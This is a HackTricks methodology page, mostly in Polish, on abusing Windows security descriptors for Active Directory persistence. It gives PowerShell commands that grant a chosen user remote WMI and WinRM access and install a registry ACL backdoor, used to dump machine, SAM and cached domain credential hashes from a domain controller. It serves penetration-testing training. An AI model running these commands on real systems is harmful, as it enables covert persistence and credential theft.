hacktricks/windows-hardening/active-directory-methodology/security-descriptors.md

5.2 KiB
Raw Blame History

Security Descriptors

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Security Descriptors

Z dokumentacji: Język definicji deskryptora zabezpieczeń (SDDL) definiuje format, który jest używany do opisu deskryptora zabezpieczeń. SDDL używa ciągów ACE dla DACL i SACL: ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;

Deskryptory zabezpieczeń są używane do przechowywania uprawnień, jakie obiekt ma nad innym obiektem. Jeśli możesz wprowadzić niewielką zmianę w deskryptorze zabezpieczeń obiektu, możesz uzyskać bardzo interesujące uprawnienia nad tym obiektem bez potrzeby bycia członkiem grupy z uprawnieniami.

Ta technika utrzymywania dostępu opiera się na zdolności do zdobycia każdego potrzebnego uprawnienia wobec określonych obiektów, aby móc wykonać zadanie, które zazwyczaj wymaga uprawnień administratora, ale bez potrzeby bycia administratorem.

Access to WMI

Możesz dać użytkownikowi dostęp do zdalnego wykonywania WMI używając tego:

Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc namespace 'root\cimv2' -Verbose
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dcnamespace 'root\cimv2' -Remove -Verbose #Remove

Access to WinRM

Daj dostęp do winrm PS console dla użytkownika używając tego:

Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove

Zdalny dostęp do hashy

Uzyskaj dostęp do rejestru i zrzucaj hashe, tworząc tylną furtkę rejestru za pomocą DAMP, aby w każdej chwili móc odzyskać hash komputera, SAM oraz wszelkie zbuforowane poświadczenia AD na komputerze. Dlatego bardzo przydatne jest nadanie tej zgody zwykłemu użytkownikowi w stosunku do komputera kontrolera domeny:

# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
Get-RemoteMachineAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose

Sprawdź Silver Tickets, aby dowiedzieć się, jak możesz wykorzystać hash konta komputera kontrolera domeny.

{% hint style="success" %} Ucz się i ćwicz Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Wsparcie HackTricks
{% endhint %}